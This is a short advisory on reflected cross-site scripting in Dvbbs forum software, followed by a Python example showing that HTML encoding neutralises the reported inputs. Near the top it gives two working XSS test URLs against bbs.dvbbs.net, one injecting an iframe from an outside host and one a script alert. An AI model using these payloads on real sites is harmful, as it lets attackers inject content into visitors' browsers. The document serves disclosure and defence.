As the largest community forum software service provider in China, the mobile network relies on powerful functions, extraordinary access speed and load capacity, friendly and convenient user interfaces, high-quality customer service, leading domestic technology, and strong, continuous product R&D and innovation capability. The community forum products it provides account for more than 70% of domestic community forum products.
The target website does not effectively filter or convert the variables submitted by the user, allowing attackers to insert malicious web code.
Test code 1:
http://bbs.dvbbs.net/showerr.asp?BoardID=8&ErrCodes=60&action=%22%3E%3Ciframe%20src=%22http://www.51chi.net/qing%22+qing
Test code 2:
http://bbs.dvbbs.net/index.asp?Boardid=8&TopicMode=0&List_Type=%27%22%29%3b%3E%3C%2fiframe%3E%3CscRiPT%3Ealert%28%27www.51chi.net/qing%27%29%3C%2fScrIPT%3E
The program (method) provided may be offensive in nature and is intended only for security research and teaching. Use it at your own risk!
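The missing "filter or convert" step, shown on the two test URLs above. This is an added Python example, not code from the advisory or from the forum software. TEMPLATE is a hypothetical echo point (the advisory does not show where showerr.asp or index.asp write the value), and html.escape stands in for the server-side encoding call.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# The two test URLs from the advisory, with extraction spaces removed.
TEST_URLS = {
    "action": "http://bbs.dvbbs.net/showerr.asp?BoardID=8&ErrCodes=60"
              "&action=%22%3E%3Ciframe%20src=%22http://www.51chi.net/qing%22+qing",
    "List_Type": "http://bbs.dvbbs.net/index.asp?Boardid=8&TopicMode=0"
                 "&List_Type=%27%22%29%3b%3E%3C%2fiframe%3E%3CscRiPT%3E"
                 "alert%28%27www.51chi.net/qing%27%29%3C%2fScrIPT%3E",
}

# Hypothetical template (assumption): the real echo point is not on the page.
TEMPLATE = '<input type="hidden" name="{name}" value="{value}">'

def decoded_param(url, name):
    """Return the parameter as the server sees it after URL decoding."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]

def render_unfiltered(name, value):
    """Echo the value verbatim, the behaviour the advisory describes."""
    return TEMPLATE.format(name=name, value=value)

def render_encoded(name, value):
    """Convert &, <, >, " and ' to entities before echoing."""
    return TEMPLATE.format(name=name, value=html.escape(value, quote=True))

class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append(tag)

def start_tags(markup):
    """List the elements an HTML parser finds in the rendered markup."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.seen

if __name__ == "__main__":
    for name, url in TEST_URLS.items():
        value = decoded_param(url, name)
        print(name, start_tags(render_unfiltered(name, value)),
              start_tags(render_encoded(name, value)))
```

With the value echoed verbatim, the parser reports an extra element beyond the template's single input; after encoding, only the input element remains and the submitted text stays inside the attribute value.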